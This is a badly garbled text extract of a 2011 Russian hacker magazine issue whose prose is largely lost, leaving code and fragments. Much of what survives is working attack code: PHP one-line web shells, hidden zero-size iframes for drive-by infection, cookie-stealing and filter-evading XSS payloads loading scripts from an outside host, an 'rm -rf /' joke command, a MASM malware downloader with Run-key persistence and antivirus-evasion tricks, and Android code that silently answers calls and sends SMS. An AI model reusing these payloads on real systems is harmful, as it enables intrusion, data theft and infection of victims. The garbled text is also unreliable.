. ,
AddUrl .
.

066

(. ).
. ,
.
.

.

.
. ,
,
,
. , . ,
: ,
, , .
,
, .
:). z

11 /154/ 2011

00000000

#hacker tweets

. . : , . , (@
asintsov) .

@jaredpar:
UDP ,
, ,
..

@kernelpool:


Windows 8.
(nt!ExpPoolQuotaCookie).

@moxie__:
: ,
.

:
. , (bit.
ly/qiWrtS).

@0x6D6172696F:
PHP
http://h.ackack.net/tinyphp-shell.html // <?=($_=@$_
GET[2]).@$_($_GET[1])?> no-alnum.
.

@thegrugq:
selective
disclosure, ,
. [
root]

:
.
. , :
<? $var1="system"; $var2="dir";
$var1($var2);?>. ,
:
http://localhost/shell.php?1=dir&2=system
@ 1 2
(, , ,
,
). ~ <?php
($_="system").$_("dir");?>.

@KrisBuytaert:
L
LDAP, S SNMP
:
LDAP = Lightweight Directory Access
Protocol
SNMP = Simple Network Management
Protocol
.

11 /154/ 2011

@chrisrohlf:

{NX, DEP, SafeSEH, SEHOP,
ASLR, RELRO, SmartPtrs,
SafeInt, /GS, Heap Cookies, Unlink
Checks ^'d fn ptrs, Reordered Vars, SDL,
Sandboxes}, , memory
corruption .

. :)

@dakami:
,

. ,
.
:

( ...)

@timROGERS:
10- IE6. ,
10-
, , 5 ...

@anonymouSabu:
:
'',
. .

@anton_chuvakin:
, ,
,

APS APT Prevention System

@zeminlu:
UNIX: sudo [
$[ $RANDOM % 6 ] == 0 ] && rm
-rf / || echo You live

@DidierStevens:
.
ASLR EMET' bottom up
randomization. -ASLR
, ASLR.

@SecureTips:
kenel.org, @
SecureTips runlevel 2,
rc3.d .

067

So Better

Iframe:


,
,

iframe, . ,

SMS-

, -
,


.

068

WARNING

. ,



,

.

WTF?
Iframe, , HTML,
-. ,
.
:
1. -. ,
;
2. , ,
LiveInternet ..
.
:
1. -;
2.
-;
3. Iframe- -
HTML-;
4. ;

11 /154/ 2011

Iframe:

NoScript Firefox

5.
( );
6. -
, , .
, :
()
?



.
.
1. .
, , . :

SEO-.
: US, UK, AU 100.
, .
- -
,
, , .
,

,
. ,
, .
, , ,
. :

.
, ,
.
2. , , , .

, ,
. , , ,
, .
,
, .
,
.
.

11 /154/ 2011

3. .
, .
,
. ,
-
.

. , .
4. SEO, .
.
,
. ,
,
.
5. .
,
. .

.
, . , , ,
. :
.
, , Word-
, .
, , ,
. ,
, .

?

: ? ,
.
1. .
, ,
, ,
. , .
,
, 100 .
, ,
. - , .
2. .
,
.

069


(
) -
. , ,
.
, ( , ..).
, .
? , ,
.
-, .
,
(, -).
,

. . ,
, , .
. ,
( ) (
) .
, ,
-.

070


IFRAME
, ,
. ,
. ,
:
1. .
, , ,

. , -
Malware Tracker'a.
,
,
.
2. .
-
, 100%

. (Adobe Flash
Player, Java, Adobe Reader), .
, ,
- .
Java,
. ,
.
3. .


. ,
? .
,
.
4. Iframe'.
,
.
, ,
.
No Ads- ,
Iframe', , NoScript (noscript.net).

, NoScript'a,
Plugins Forbid <IFRAME>.
5. JavaScript.
, ..
.
:). ,
,
.





11 /154/ 2011

Iframe:

3.

4.

5.

6.

7.


, .

.
/.
.
-,
.
.
,
,
.
, , , , , .
/ /
.
,
. - , ,
Zeus SpyEye,
,

.
, .
: ,
( ).
.
DDoS- .
-
-.
.
.
Rustock, 4
.
.
,
.

.

, ,
. , . , ,
HTML- -

11 /154/ 2011

( ,
iframe ):
<iframe src="http://site.ru/1.php" width="0" height="0"
frameborder="0"></iframe>
site.ru/1.php . :
width="0"
height="0"
frameborder="0"
,
. . , ,

. n- .
, ,
-,
. ,
,
.

,
. ,
. ,
. ,
. z

071

BEAST

072


SSL/TLS
SSL-
!

SSL.

,
BEAST
,
,
.
BEAST?
103 BEAST (Browser Exploit
Against SSL/TLS), PayPal. YouTube (bit.ly/
omqAsQ). .
Ekoparty -,
proof-of-concept.
, - .
-
, SSL/TLS ,
. , ,
,
.
, whitepaper'

11 /154/ 2011

BEAST: SSL-

(bit.ly/oBLWHX). : , HTTPS-,
, JavaScript Java, ( , ,
). ,

, .
?
SSL 3.0/TLS 1.0, .

SSL 1.0
SSL 1.0/TLS 3.0
, ,
. , , ,
. , .

.
,
2^128 ,
. ,
.
:

Ci = E(Key, Mi xor Ci-1)


XOR
(Initialization Vector, IV),
,
. .
, , , ,
. , SSL/TLS
, . SSL/TLS-
HTTPS-,
, ,
,
, .
CBC:
, .

, CBC- . ,
n (n-1).
, . SSL 3.0/TLS 1.0
, .

C = E(Key, M),


M , Key , C .
( , 16 ).
: ? ( 16 )
.
(ECB, Electronic codebook),
. : ,
.
,
.
(,
Cipher-block chaining),
XOR' :

11 /154/ 2011

,
BEAST , . :
, . :
- .
? ,
. , i- , , ,
( ).
Ci, Mi . , Ci = E (Key, Mi
xor Ci-1). , .
, ! , ( ) ,

073

CBC-

. , ,
( )
IV. ,
Ci Ci-1. .
,
:

ECB

, .
.

M1 = Ci-1 xor IV xor P.


,
:
C1 =
=
=
=

E(Key, M1 xor IV) =


E(Key, (Ci-1 xor IV xor P) xor IV)
E(Key, (Ci-1 xor P))
i

, , M1,
, , (IV xor IV)
( XOR). ,
( M
P),
C1 Ci! :


, ? ?
, TLS1.0,
. ,
BEAST,
TLS 1.1 .
? ! .
, TLS 1.1 , !
: ? ,
. ,
(TLS 1.0 SSL 3.0), Java. ,
, .

, , ,
M. M 16 .
, , , 2^15 (32 768) .
? ,
M. :
.
. , , .
. , ,
8 . , ,
. ,
15
,
. , ,
: user: alice password: ********, ******** .
, [lice password:
*] [*******.........],
. , 256 .
:)! ,
: 14 .


SSL

074

11 /154/ 2011

BEAST: SSL-

103 PayPal

, . :
256 , .
, .
BEAST ,

.
( ),
.


, .
BEAST,
:

, ;

;

(-) HTTPS-;
,
BEAST ,
( ).
, .
, : Javascript XMLHttpRequest API, HTML5
WebSocket API, Flash URLRequest API, Java Applet URLConnection API,
Silverlight WebClient API.
- , . HTML5 WebSocket
API, Java URLConnection API, Silverlight WebClient API. ,
,
HTML5 WebSockets.
, .

11 /154/ 2011

.
BEAST, ,
, Javascript/Java, .
JavaScript
. , ,
SOP (same-origin policy, ).
, JavaScript.
,
, ,

. ,
(, paypal.
com). SOP, Java 0day- .
, .
, - ? SOP,
(
), , .
(bit.ly/q6AebB).

RESPECT
,
,
, ,
.
, .
, . Good job! z

075

(icq 884888, http://snipper.ru)

X-Tools


:
Zdez Bil Ya

:
[i]Pro

:
Insecurity Research

URL:
bit.ly/q4PQte

URL:
bit.ly/pqcYCq

URL:
insecurityresearch.
com/insect

1

WORDPRESS P&E
-

WordPress!
,
. , : WordPress P&E Zdez Bil Ya.
,

. :
WordPress;
;
( );
.
,
.
.
,

302
403.
:
, .
, ,

wordpress.org.

076

2

WP BRUTE
WordPress.
WP
Brute, ,
, . ,
-
-,
,
? :
SSL;
(max. 50);
HTTP(S)-;
Source;

.
.

Source.txt :
admin:123
admin:qwerty
ololo:wtfwtf
,
.

3

INSECT PRO
INSECT Pro
.

.
,

Metasploit. , :
,
INSECT;
IPv4 IPv6 ;

- ;
//clientside ;
SQL/XSS/PHP-;
;
;
;
;
;
Metasploit.

,
,

.
, .

11 /154/ 2011

X-Tools

:
Turbo Mailer
URL:
bit.ly/oovCRY

][-

.

Mail.ru.

. ,
:
e-mail
mail.ru;

;
6 40 ;
;
;


;
;
;
;
antigate.
com;
;
(HTTP/SOCKS4/
SOCKS5);
mail.ru .


.
, , .

:
M@xPain, Perplexity

:
@MaxPainCode

:
_Alien_

URL:
twitter.com/maxpaincode

URL:
twitter.com/#!/maxpaincode

URL:
bit.ly/r37TAL

4
VULNERABILITY MASTER:
GOOGLE-
Vulnerability Master
,
. , ,
. :
;
SQL-;
;
SQL.
,
-:
1. (, cmspages.php?id=, game.
php?id=, index.php?id= ..);
2. ( 100);
3. (
inurl:);
4. Scan;
5.

Vulnerability Scanner.

, .
, , ,
.

11 /154/ 2011

MAIL.RU TURBO MAILER

5

DDOS-
DDoS Tracer -,
,
.


, ,
. : DDoS Tracer .
:
1. -
,
;
2. ,
;
3.
,
, .
- :
;
;

DDoS-;
.

bit.ly/nHHxAm.

6
DED TOOLZA:

Ded Toolza . ,
. :
/
( );
-;
;
ClearLock;
VNC-;
;
;
CMD,
.
,
. :
1. (
);
2.
;
3. (,
);
4. .

, .

077

|qbz| (lopuxin.iv@yandex.ru, http://essenzo.net)

XSS:

- !

XSS
5

XSS .

,

!


.

,
XSS .

078

INFO
XSS -,


JS-.

- ,


,
XSS , . PHP

HTML-, .
htmlspecialchars() strip_tags().
,
"<" ">" strip_tags().
, ,
:

WARNING

. ,



,

.

WWW
raz0r.name
XSS

ha.ckers.org/
xss.html

XSS
kanicq.ru/sniffer

bit.ly/bK7NW7

XSS
drakasmit.ru/kakrabotal-xss XSS
SEO

<?php
echo('<img src="'.strip_tags($_GET['img']).'">');
?>

<script>, - :
<img src="[ script]">
JavaScript, <script>? JS-
HTML-.
, , IMG. onError
(
Google), :
<img src="img.jpg" onError="alert('
');">
JavaScript-, .
$_GET['img']:

11 /154/ 2011

XSS: - !

-5 XSS
1. htmlspecialchars().
HTML, , .
2. strip_tags().
htmlspecialchars()
,
, . : <, >, < img.
3. BB-.
, ,
HTML:
[video=http://video.com/video.mp4]My Video[/video]
4. .
- , - , -
, .
HTML-
.

$res[] = ord($sym);
}
return implode(", ", $res);
}
echo(vcifry(" JavaScript"));
?>
JavaScript :
<script>eval(String.fromCharCode(118, 97, 114, 32, 105,
...
110, 116, 46, 99, 111, 111, 107, 105, 101, 41, 59))</script>
, <>:/.=

JavaScript .
.
*.js-, , ,
, -.
:
<script src=http://nash.host.ru/script.js></script>
,
, ,
.

5. .
,
XSS, . - .

!@#$%^&" onError="alert(1);" musor="


:
alert('XSS')

<img src="!@#$%^&" onError="alert(1);" musor="">


,
onError 1. ,
alert(1); JavaScript-, .
,
htmlspecialchars(), HTML-
.
, <>().,/
, < >
, , , , .
?
JS-, .
JavaScript, : eval() String.fromCharCode().
JavaScript,
.
.
PHP:
<?php
function vcifry($text)
{
$res = array();
foreach(str_split($text, 1) as $sym)
{

11 /154/ 2011

JavaScript

079

!

XSS?
:

,
XSS ,
cookie .

,
,

.
(, ,
)
XSS
. ,
iframe
.

<?php
...
$id = mysql_fetch_array(mysql_
query("SELECT id FROM kapchi;"));
$captcha_id = $id['id'];
echo('
...
<h1 style="color:gray;fontfamily:verdana;">,
:</h1>
<img src="http://nash.host.ru/captcha.
php?img='.$captcha_id.'">
...
');
?>

.


,
,
:
$session = md5($login.":".$passwd.":".$_
SERVER['REMOTE_ADDR']);
.
.
:
/changePasswd?oldpassword=[
]&newpassword=[ ]

iframe, :


JavaScript + PHP


.
,
:

CSRF
, /,
,
ip-,
. XSS .
, ,
. ?
,
:

<html>
<script>
document.getElementsByTagName('html')
[0].innerHTML += '<iframe src="[
]" border="0"
frameborder="0" width="0" height="0"></
iframe>';
</script>
...
</html>

<script src="http://nash.host.ru/script.
js">
// script.js

login=admin
password=1234
session=f13db539e8aebff0c82ce57a05d17b9f

, ,
,
.

, <>:;/,=
data,
base64 src. :
<script src=data:;base64,YWxlcnQoKTs=></script>
data
:
data:MIME-;,
alert(),
base64. ,
,
.

XSS

,


080

JS-
HTML- , ,
JavaScript! :
<html>
...
<script>
var a = "<?php echo($_POST['data']); ?>";
// "a"

11 /154/ 2011

XSS: - !

</script>
...
</html>

HTML- ,

:
123"; alert(document.cookie); b="
alert-, :
<html>
...
<script>
var a = "123"; alert(document.cookie); b="";
// "a"
</script>
...
</html>
BB-
,
BB-,
, : [a], [img], [b].
, -
"[" "<", .
js-.
:

XSS WordPress

[img src="!@#$%^" onError="alert(1);"]



:
<?php
...
echo('<input type="text" value="'.strip_tags($_
POST['data']).'">');
...
?>
? , , onMouseOver. , , ,
(
).
input. style. ? ,
.
.
:
" onMouseOver="alert(document.cookie)"
style="position:absolute;
top:-1000px;left:-1000px;width:5000px;height:5000px;z-index:10000;"
musor="

JS- .
javascript: alert(1);. , :

XSS DuoCMS

<script src="javascript:alert(document.cookie);"></script>

- , <>.

, ,
XSS
/. ,
: body, script, javascript.
bOdY, sCrIpT JaVaScRiPt, .

,
.
, .
, .
:
$code = str_replace("<body", "", $code);

<a href="javascript:alert(document.cookie);"> </a>


<iframe src="javascript:alert(document.cookie);"></iframe>

11 /154/ 2011

081



XSS-

XSS:


XSS (, )
.
: /,
VPN, .


Opera (
cookies),
.
.
,
JS-.
,
javascript:document.cookie="key=value";
(
Enter).



- "><script>alert(1);</
script>. ,
, 2 ,
.
XSS
.
,
"<" ">"
"<!>". HTML ,

,
:
Dead <Body> Track 6.mp3
.

XSS

XSS
.
, .
. HTML
:
<body onLoad="location.href='
'"></body>
-
(, dalmatincy.fhost.ru) oshibka.
jpg .htaccess
:
AddType application/x-httpd-php .jpg

:
,
,
: http://dalmatincy.fhost.ru/
oshibka.jpg

iframe .
iframe
JS :
<script>var l=['reverse','join','split',
'slice','93B','2C5F//
...
/9/43D225F//73/3/F/E74223E3C2F/4/97/3E27
293'],i1='6',
il='con\x73\x74\x72\
x75ctor',ll='',_=['length',
'unescape'],li=[],l1=this;l=l[l[3]](4)
[l[0]]()
...
join(ll))();</script>
JavaScript
.

function recursiveReplace($text, $replace, $repalce_to)


{
$text = str_replace($replace, $repalce_to, $text);
return (strstr($text, $replace)) ?
(recursiveReplace($text, $replace, $repalce_to)) :
($text);
}
$code = recursiveReplace($code, "<body", "");
<body ,
. :

082

JavaScript flash
,
flash-
.
-,
.


HTML- ,

XSS. -
.

Gareth Heyes:
javascript:/*--></marquee></script></
title></textarea></noscript></style>
</xmp>">[img=1]<img -/style==expression&#40&#47;&#42;/-/*&#39;,/**/
eval(name)//&#41;;width:100%;height:100%
;position:absolute;behavior:url
(#default#VML);-olink:javascript:eval(title);-o-linksource:currentname=
alert(1) onerror=eval(name) src=1 autofocus onfocus=eval(name) onclick=
eval(name) onmouseover=eval(name) backgr
ound=javascript:eval(name)//>"
, ,
(twitter.com/#!/garethheyes). , XSS, ,

, .

- .

. ,
XSS,
.

<bo<bodydy onLoad="alert(1)">
<body :
<body onLoad="alert(1)">

, , -
, .
, . ,
,
, z

11 /154/ 2011

Preview

92


,
,
, .
2008
Dropbox,
, ,
.
,
, ,
.
Python,
Amazon S3+EC2, 25
.

MALWARE

84


.
.

UNIXOID

88


Android Market ,
.
?

CODING

106

ANTIHASP

HASP.
, .

11 /154/ 2011

114


Linux-
30% ,
5% , 128
-? !

SYN/ACK

110

DLL-
,
exe- ,
.
DLL .

129


,
,
. ,
.

083

MALWARE


AVG, AVAST, CLAMAV, PANDA,
COMODO: ,

,

, .
:).

.
,
? ,
, ,
.
,
?

084

DVD

.

: AVG,
Avast, ClamAV, Panda, Comodo. ,
, , , , . VmWare
Windows XP SP3 x86.
,
MASM. (xakep.ru/post/56236/default.asp) , Downloader,
, .
x86, ,
Windows.


:
.data
pi PROCESS_INFORMATION <>
startupinfo STARTUPINFO <>
.data
pKey dd ?
RunKey db "SOFTWARE\Microsoft\Windows\CurrentVersion\Run", 0
Malware db "Malware",0

11 /154/ 2011

comodo . !

.code
url db "http://www.malwareurl.com/malware.exe",0
pathtosave db "c:\windows\system32\malware.exe",0
start:
invoke URLDownloadToFileA, 0,
offset url, offset pathtosave, 0, 0
invoke RegCreateKeyExA, HKEY_LOCAL_MACHINE,
offset RunKey, 0, 0, REG_OPTION_NON_VOLATILE,
KEY_ALL_ACCESS, 0, offset pKey, 0
invoke lstrlenA, offset pathtosave
invoke RegSetValueExA, pKey, offset Malware, 0, REG_SZ,
offset pathtosave, eax
invoke RegCloseKey, pKey
invoke CreateProcessA, offset pathtosave, 0, 0, 0,
NORMAL_PRIORITY_CLASS, 0, 0, 0, offset startupinfo,
offset pi
invoke ExitProcess, 0
retn
URLDownloadToFile,
CreateProcess. . , . ,
Downloader AVG
ClamAV. AVG , ClamAV, , Win32/DH W32.SPERO.Prolixus.0825 . .

clamav ,
, . !

mov eax, [eax + 10h]


mov eax, [eax + 03Ch]
mov eax, [eax]
cmp eax, dword ptr [discCroot]
jz malware_code
jmp exit
malware_code:
,
.
. , :).
EAX
30h FS. Windows NT PEB (Process Environment Block).
, .
, 10h PEB RTL_USER_PROCESS_PARAMETERS.
3C.
,
. ,
C, EAX discCroot.
,
.
, EAX C,
.
, , , ,
. , ,
,
.


,
kernel32. :

kernel32 db "kernel32",0
dword_PE db "PE",0,0

discCroot db "C", 0, ":", 0


start:
assume fs:nothing

start:
push offset kernel32
call LoadLibraryA

mov eax, fs:[30h]

mov ecx, [eax + 03ch]

11 /154/ 2011

085

MALWARE
/AV-
AVG

Win32/DH

Win32/DH

Win32/DH

Avast

W32.SPERO.Prolixus.0825

W32.SPERO.Prolixus.0825

W32.SPERO.Prolixus.0825

W32.SPERO.Prolixus.0825

W32.SPERO.Prolixus.0825

Panda

Comodo Internet Security

ClamAV Immunitet

mov eax, [eax + ecx]


cmp eax, dword ptr [dword_PE]
jz malware_code
jmp Exit
kernel32.
e_lfanew IMAGE_DOS_
HEADER.
. PE-, LE- NE. , ,
PE\0\0. .
, , , , , downloader.
.


, API.
,
. TreeResetNamedSecurityInfo:
.code
url db "http://www.malwareurl.com/malware.exe",0
pathtosave db "malware.exe",0
start:
invoke TreeResetNamedSecurityInfo,0,0,0,0,0,0,0,0,0,0,0
cmp eax, 78h
jz Malware_Code
jmp Exit
MSDN, security information
.

, 78h.
,
- -,
, , ExitProcess.
- AVG,
, , ClamAV.


, ,
.
:
.code
url db "http://www.malwareurl.com/malware.exe",0
pathtosave db "malware.exe",0
start:
mov ecx, 5000h
push ecx
Cycle_Begin:
call GetTickCount
sub edx, eax
push 1000h
call Sleep
push 0
call GetModuleHandle
pop ecx
dec ecx
push ecx
jnz Cycle_Begin
5000h
GetTickCount, GetModuleHandle Sleep, 1000h.
,
(
Downloader :
1000h * 5000h = 5 000 000h = 83 886 080 = 83 886 = 1398 = 23
). , ( - ),
.
,
. .
ClamAV , W32.
SPRO.Prolixus.0825.

AVG.

086

. Panda ?! ClamAV
, ?! AVG, ,
?! , , . z

11 /154/ 2011

Zeronights

ZERONIGHTS

.
, , security-
. , ,
Zeronights,
25 .
DEFCON
Digital Security.
,
,
0day .
, ,

,
. , : ,
(CEO Immunity, ),
(CorelanTeam, ), The Grugq (COSEINC,
), (PWC, ),
(DigitalSecurity, ),
( X, ) (ESET, ).
:
(Cisco).
! :
?.

11 /154/ 2011

(Amorize).
, , X-Probe.
. :
-.
(NetSquare). ,

.
. : - 3.
(DigitalSecurity).
.

?.
(ESET). Virus-Freeman
. :
.
(Digital Security).
SAP .
. FastTrack: , :

.


, . !

FAST-TRACK
,
, , ,
,
. 15
,
. ,

5
,
.


,
-.
Zeronights .
-
.

0day .
AC-, , SAP
! ,
WAF,
(lockpicking) c , . z

087

MALWARE

ka Night Storm (nstorm90@gmail.com)

088

11 /154/ 2011

WARNING

WWW

WARNING



.
,

blog.trendmicro.com
Trend Micro,

,

,
.
Google++
www.brighthub.com/mobile/
google-android.aspx
,

Android,
.



. ,


.

SMS?


:

?

OC Android .

,
, ,
.
.


. , ,
.
, ,
Google , , .
, Google , , (Myournet), , ,
.
,
, .
,
,
,
.
:
/shangzhou/callrecord
*.amr. , -,
, -

11 /154/ 2011

, . ,
, ,
;).

Google++, .
,
.
: ,
. ,
, , ,
,
.


Google ,
. , :).
( Apple AppStore) ,
.
.
,
? ? ,
. :). , ,
.
1. . - .
,
. , , , ,
,
, ..
2. . Myournet: Guitar Solo Lite
Super Guitar Solo, Super Sex
Positions Hot Sexy Videos. , ? ,
Super, Hyper :).
3. .
: , , GPS,
. ,
, ,
, , .

089

MALWARE

GOOGLE++
Google++,
,
Trend Micro. ,

. , .
: ,
.

private
{
int i
int j


void silenceResponse()
= Log.w("spy","silenceResponse");
= this.audioManager.getRingerMode();

this.oldRingerMode = j;
int k = this.audioManager.getVibrateSetting(0);
this.oldRinger = k;
int m = this.audioManager.getVibrateSetting(1);
this.oldNotification = m;
this.audioManager.setRingerMode(0);
this.audioManager.setVibrateSetting(0, 0);
this.audioManager.setVibrateSetting(1, 0);
}

090

Advanced task killer


private void answerCall() {
try {
PhoneUtil.getITelephony(this.tm).silenceRinger();
boolean bool = PhoneUtil.getITelephony(this.m).
showCallScreenWithDialpad(0);
PhoneUtil.getTelephony(this.tm).answerRingingCall();
Thread.sleep(800L);
goToHomePage();
setKeyguard(0);
return;
}
}


, , ,
. ,
Android. , :
SmsManager:

private static final int ReqCodeSms = 123;
public synchronized void SendSms(String phone,
String text){

11 /154/ 2011

PendingIntent Result = createPendingResult(


ReqCodeSms, getIntent(), 0);
SmsManager.getDefault().sendTextMessage(phone,
null, text, Result, null);

Activity"></service>
Service_Activity .
, , :

}
, . , .
, Scripting Layer For Android,
.

,
public class Service_Activity extends Service {
private Timer timer = new Timer();
public void onCreate(){
super.onCreate();
startservice();
}

?
, . , ,
.
, Advanced Task Killer. :
- , .

private void startservice(){


timer.scheduleAtFixedRate(new TimerTask(){
public void run(){
//
//
}
},0,1000);


- , ,
Android-
.
, , .
, . -, Android ,
Home,
, Home
.


. : ( ),
. -
,
, ,
( , :)). ,
, root-, , , (
) ,
-, .
, ,
API Android, , . Android 2.2 :

DevicePolicyManager devicePolicyManager =
(DevicePolicyManager) getSystemService(
Context.DEVICE_POLICY_SERVICE);
devicePolicyManager.lockNow();
,
, -
, .

:
Android . . Eclipse
. ,
AndroidManifest.xml. :
<service android:enabled="true" android:name=".Service_

11 /154/ 2011

}
private void stopservice(){
if(timer != null) {
timer.cancel();
}
}
}

,
. , ,
, . ,
.

?
,
,
. ,
Google ,
.
,
, ,
? , ,
. , ,
(,
,
).
:
. Location & security
.
: - ,
, , ,
, . :
, - , , .
- , ,
. ,
,
. z

091

Mifrill (mifrill@gameland.ru)

Dropbox
.
.

,

?
.


Dropbox

092

11 /154/ 2011

DROPBOX:

25


Dropbox
: 27-
, .
Dropbox', ,
.
,
, -
, .

.
, ,
. -,
. -, ,

.
. ,
, , ,
(
) . 5
success story,
. . ,
.


Dropbox Bit9, Accolade
Hubspot,
. ,
, :

11 /154/ 2011

5 ,
14 .
,
. ,
Dropbox , ,
, -
,
. :). ,
,
, , .
-
, , .
, ,
4 ,
.

Dropbox.

DROPBOX

Dropbox
.

Dropbox
Skype, QIP .

Dropbox ,
, .

Dropbox
.

Dropbox .


2007
, Dropbox Inc.
. ,
,
,
.
(bit.ly/raHM1K),
- Y
Combinator. , , ,

Python, sqlite ( ), mysql ( ),
turbogears Amazon EC2 S3



Wiki :
wiki.dropbox.com/TipsAndTricks.

093

, .
:)

. Dropbox
.

. ,
.
:
subversion, trac rsync

Dropbox.
,
,
. ,
: v2 11-15-06.doc.
(beinsync, Foldershare),
(Carbonite, Mozy),
/
,
.
3
. 5
. 2 .
. Python C++,
Cheetah, - ..
freemium, 1

( $5, ,
, ,
- $20 ).
.

094


.
Dropbox
Dropship.

,

.
Dropship, , MIT Dropbox
.
Dropbox:
, Dropbox,
Dropbox
. , ,
.avi-, ,
Dropbox . Dropship
,
(!) ,
Hacker News,

github.
. Dropship

,
github, Dropbox.
Dropbox
.
,

.

2011,
Dropbox.


. Dropbox
. ,
-, :
config.db,
%APPDATA%\Dropbox
.
email, dropbox_path host_id.
,

.
Dropbox
host_id, config.db
.
, config.db
Dropbox
,
.
, , ,
host_id
.
,

. FAQ Dropbox : AES-256

. - ,

: Dropbox ,
,
,
.
Dropbox ,
,
, , ,
.
,
2011
USENIX Security Symposium
Dropbox.
Dropbox
,
. ,
- ,
Dropbox. ID .
, ,
Dropbox
SSL URL.
-
ID, ID
,
.



: $233-388,
$99
11 /154/ 2011

>> coding

Dropbox , .

2007 $15 000


Y Combinator.

, 15 .

-,
Sequoia Capital.
,
$1.2 . 2008
$7.2 . , , .



, ,

. 2008 Dropbox

.
, .

. ,
Dropbox ,
getdropbox.com


email, .
2008
, ,

,
.
, . ,
, .
,

Dropbox
-. Digg, Dropbox

? ,
7-10 .
15 000 .
,
12 000 ,
wait-list 75 000 !
Dropbox,
TechCrunch50
2008 ,
. ,
. ,
, 2008
, ,
.
PR - . ,
, ,
,

. .
SEO-, Dropbox

. , ,
,
,
,
. Dropbox,
. SEO' :).
( , ), ,
:
$233-388, $99
! Epic fail!
: ,
, , ,
.
Dropbox ,
.



, , : 2009
1 .
, Dropbox
.
. ,
Dropbox


Dropbox, ,
, ,
:
:
! ?
: - ?
: ...
: , ?

096

11 /154/ 2011


. Dropbox
, ,
. ,
,
.
IT- ( NY Times The Wall
Street Journal Dropbox
:), , .
,
, ,

, - ,
, . ,

.
, , .
,
. ,

250 (
+500 ).
8 ( 16 32
).
! . 2010 ,
, 2.8 .
!


Dropbox.
.
!

100 , 2010
4 , 25 .
60%- .

DROPBOX
,
. , . , Dropbox
2% .
2010 $14 . ,

Amazon,
. , ,
,
Dropbox $30 . $100 .
TechCrunch, Dropbox $200
$300 ,
$5-6 !
, ,
2011
(8120 ..
1022 ..) ,

65 400+ . . z

11 /154/ 2011

097

000, 00spersky Lab


000, 00

BRIEF
2008

.

ERPScan SAP.

Oracle :
.


: BlackHat, HITB,
HackerHalted, Source,Confide
nce,DeepSEC,Troopers,
SecurityByte ..

0000

:
, ,
,
.

098

11 /154/ 2011

00000000

SH2KERR

DIGITAL SECURITY

,
.
-,
:
,


- SAP.

11 /154/ 2011

SAP
? ?

, , e .
,

. , e e .

. , , ,
,
. -
, .
, ,
( , , , ).
, - ,
PHP-. -
,
, e
, , , e
. , : ,
XP,
. ,
,
, ,
.
ASLR. ,
, , e,
, e.

099

, ,
, .
,
,
. ,

.
, :
, ,
, .

,

.


,
, ,
.
, .
.
(, ,
). ,

e
. -
.
,

,
. , ,
, e, e,
:).


ORACLE?



.

,
(,
Wi-Fi, )
, web :).

,
ORACLE. ?
?

, ,
,
- ,
.
.

, ,
. e
, .
, , :
, e 10
. , :).

,

?
,
?

, e,
.
(
, ).
.


?
?

.

,
: e,
, ,
.
,
, e
-
- .
, e ,
, ,
, ERP ( SAP).


.
?



SAP ERPScan. e, , :
, , ,
, / .


-
. SAP -
(SCADA). ,
,
. SAP
, SCADA
. , , SAP
, ,
.
, ,
.

.

.
,
. ?
, ,
, e
,
. , -
, , ,
SAP
.

:).

,
?


Onapsis X1.
e-
:
,
.

,
.
,

.
e ,
,

(),
SAP
( e
).


ERPSCAN ?

ND.
,
,
.
, .
e, , .
, . ,
, ,
, .
, (,
, ,
,
).
,
. .


SAP?

2008 : ORACLE

100

11 /154/ 2011

00000000

SAP, ,
. Product Security Response
Team, ,
. e ,
,

-
SAP, ?

e.
,
,
,
.
,
, e . ,

e. ,
SAP , e,
.
,
, ,
BlackHat
0day-,
SAP-.
SAP ,
SAP .
,
Pending-.

e :).
, e :
,
,
.
,
, .
.
Rapid7 , :).
: ,
, ,
. : 15
000 5 :).

, ,
e :).
. - ,
- HDMoore, - .
- .

. , ,
. .

Oracle-
, .
,
, .


. ?

- ?
- ?

. , ,
,

.
, ,

. ,
e.
- ,
-
, PDF
, . ,
, ,
.
,
.


DEFCON
BLACKHAT, ?
,
?

,
,
, .
,
-.
.
SAP-. ,
SAP-,
. google.com,


:). ,
, . :
, -
, ,
, ,
! ,

,
.

, ,
.
,

,
.
.

,
25, ,
.

,
. , e
- , ,
,
. ,

e .
:
, e , e
, ,
.
. e
.
,
, .
, ,
.
-
: , , e,
, , ,
:). z

DIGITAL SECURITY 2002

11 /154/ 2011

0101

daredavil2014 (devil@softcom.lv)






,
.
:
.
,
.
WWW
www.esolangs.org
,
wiki


4mhz.de/bfdev.html
IDE brainfuck'a

"" Piet .

102


, ,
, - , , , . (,
, ).
, , ,
. 70-
,
, .

.
, ,
- , -
.
, ( ),
,
.
, .
- Brainfuck FALSE ,
.

11 /154/ 2011

,
(Turing tar-pit), ,
, .
-,
.


. ,

, ,
.
,
,
. , ,
.
,


.

. :
.
, ,
,
. ,
, ,
.

-. .
, ,
.
, F(a) = b,
, , a
b.
, ,
a, , F(a) = b.
, .
- ,
, ,
, .
- : f a
f.a, F(a),
, , a

BRAINFUCK

MALBOLGE

, .
, .
,

. ,

, Brainfuck.
. , , ,
BF - , ,
.
brainfuck,
, brainfuck-. , , (Cow),
(Owk, - ).
,
.

, ,
Malbolge,
.
, hello
world,
.
2004 . , , , ,
, , ,
Anthony Youhas.
,
. ,

, , (, ,
), hello world:


,
.

, .
,
.
,
,
, 5060- .
,
- ,
, , .


,
, .

, ,
, .
,
, . , ,
?

++++++++++[>+++++++>++++++++++>+++>+<<<<-]>++
.>+.+++++++..+++.>++.<<+++++++++++++++.>.+++.
------.--------.>+.>.

11 /154/ 2011

(=<`:9876Z4321UT.-Q+*)M'&%$H"!~}|Bzy?=|{z]Kw
ZY44Eq0/{mlk**hKs_dG5[m_BA{?-Y;;Vb'rR5431M}/.
zHGwEDCBA@98\6543W10/.R,+O<

103


f a. b- ( ).
( , ), :
, :
F(x1,x2,...,xn): F(x1,x2,...,xn) = x1*F(1,x2,...,xn)
v!x*F(0,x2,...,xn).
(
), , *,v,! (, ), ,
, . ,
(
) .
:
( ),
. : , , .
, ,
, . :
,
, .

, ,
.
, ,
.

,

, .
, , , ,
.
, ,
,
. z

INTERCAL
, , . 1972 , ,
( ). -
,
PLEASE
(), FORGET () ABSTAIN ().
,

PLEASE ABSTAIN FROM CALCULATING (
).
DO ,1 <- #13
PLEASE DO ,1 SUB #1 <- #238
DO ,1 SUB #2 <- #108
DO ,1 SUB #3 <- #112
DO ,1 SUB #4 <- #0
DO ,1 SUB #5 <- #64
DO ,1 SUB #6 <- #194
DO ,1 SUB #7 <- #48
PLEASE DO ,1 SUB #8 <- #22
DO ,1 SUB #9 <- #248
DO ,1 SUB #10 <- #168
DO ,1 SUB #11 <- #24
